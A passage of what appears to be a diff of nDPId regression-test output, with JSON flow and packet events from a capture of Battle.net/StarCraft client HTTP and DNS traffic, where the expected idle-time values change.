{"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/homepage?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985434,"flow_last_seen":1437389985434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985434,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1437389985434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985434,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOhAAIAGLLjAqAFkUO+6KA3FAFDb6m0AAAAAAIACIAAq7AAAAgQFtAEDAwgBAQQC"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985446,"flow_last_seen":1437389985446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985446,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1437389985446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985446,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOlAAIAGLLfAqAFkUO+6KA3GAFDf523sAAAAAIACIAAmAgAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1437389985486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985486,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcUKff272+ptAWASOQgysAAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1437389985486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAOxAAIAGLMDAqAFkUO+6KA3FAFDb6m0BCn39vFAQ+vCIhAAA"} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985434,"flow_last_seen":1437389985495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985495,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/live-events.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1437389985499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985499,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcb00A3Z3+dt7WASOQgzVQAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1437389985499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985499,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAO5AAIAGLL7AqAFkUO+6KA3GAFDf523t9NAN2lAQ+vCJKQAA"} -00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985446,"flow_last_seen":1437389985508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985508,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/client-homepage.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389983663,"flow_last_seen":1437389983663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389983663,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1437389983663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983663,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EZpAAIAGHBTAqAFkUO+6Gg3BAFD6MpY\/AAAAAIACIADjdgAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1437389983723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983723,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcFck85k+jKWQGASOQjIewAAAgQFtAAA"} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1437389983723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983723,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZtAAIAGHB\/AqAFkUO+6Gg3BAFD6MpZAXJPOZVAQ+vAeUAAA"} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983663,"flow_last_seen":1437389983723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389983723,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389983788,"flow_last_seen":1437389983788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389983788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1437389983788,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983788,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RFRAAIAG6V7AqAFkUO+6FQ3CAFAtDsyVAAAAAIACIAB6SQAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1437389983846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983846,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDcLXOt3ELQ7MlmASOQjVRgAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1437389983846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983846,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRFZAAIAG6WjAqAFkUO+6FQ3CAFAtDsyW1zrdxVAQ+vArGwAA"} +00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983788,"flow_last_seen":1437389983846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389983846,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985308,"flow_last_seen":1437389985308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985308,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1437389985308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985308,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EaZAAIAGHAjAqAFkUO+6Gg3DAFAjjlJ6AAAAAIACIAD93gAAAgQFtAEDAwgBAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985320,"flow_last_seen":1437389985320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985320,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1437389985320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985320,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EadAAIAGHAfAqAFkUO+6Gg3EAFAnGJJ3AAAAAIACIAC6VgAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1437389985363,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985363,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcNyhhfoI45Se2ASOQiDbQAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1437389985363,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985363,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEahAAIAGHBLAqAFkUO+6Gg3DAFAjjlJ7coYX6VAQ+vDZQQAA"} +00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985308,"flow_last_seen":1437389985373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985373,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/live-event?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1437389985376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985376,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcQgMkzhJxiSeGASOQhdQAAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1437389985376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985376,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEapAAIAGHBDAqAFkUO+6Gg3EAFAnGJJ4IDJM4lAQ+vCzFAAA"} +00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985320,"flow_last_seen":1437389985385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/homepage?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985434,"flow_last_seen":1437389985434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985434,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1437389985434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985434,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOhAAIAGLLjAqAFkUO+6KA3FAFDb6m0AAAAAAIACIAAq7AAAAgQFtAEDAwgBAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985446,"flow_last_seen":1437389985446,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985446,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1437389985446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985446,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOlAAIAGLLfAqAFkUO+6KA3GAFDf523sAAAAAIACIAAmAgAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1437389985486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985486,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcUKff272+ptAWASOQgysAAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1437389985486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAOxAAIAGLMDAqAFkUO+6KA3FAFDb6m0BCn39vFAQ+vCIhAAA"} +00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985434,"flow_last_seen":1437389985495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985495,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/live-events.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1437389985499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985499,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcb00A3Z3+dt7WASOQgzVQAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1437389985499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985499,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAO5AAIAGLL7AqAFkUO+6KA3GAFDf523t9NAN2lAQ+vCJKQAA"} +00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985446,"flow_last_seen":1437389985508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985508,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/client-homepage.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1437389985821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1437389985821,"pkt":"hCYVPnXEIImEa8W6CABFAABGX2kAAIARVovAqAFkwKgB\/tisADUAMndemisBAAABAAAAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQAB"} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1437389985852,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1437389985852,"pkt":"hCYVPnXEIImEa8W6CABFAABGX2oAAIARVorAqAFkwKgB\/tisADUAMndemisBAAABAAAAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQAB"} 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1437389985882,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1437389985882,"pkt":"IImEa8W6hCYVPnXECABFAAC0AABAAEARtYbAqAH+wKgBZAA12KwAoDk1miuBgAABAAQAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQABwAwABQABAAAAGwAlC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAllZGdlc3VpdGXAIcA2AAUAAQAAUvQAEQVhMTk2MQFnBmFrYW1hacAhwGcAAQABAAAAEwAEAuQucMBnAAEAAQAAABMABALkLms="} 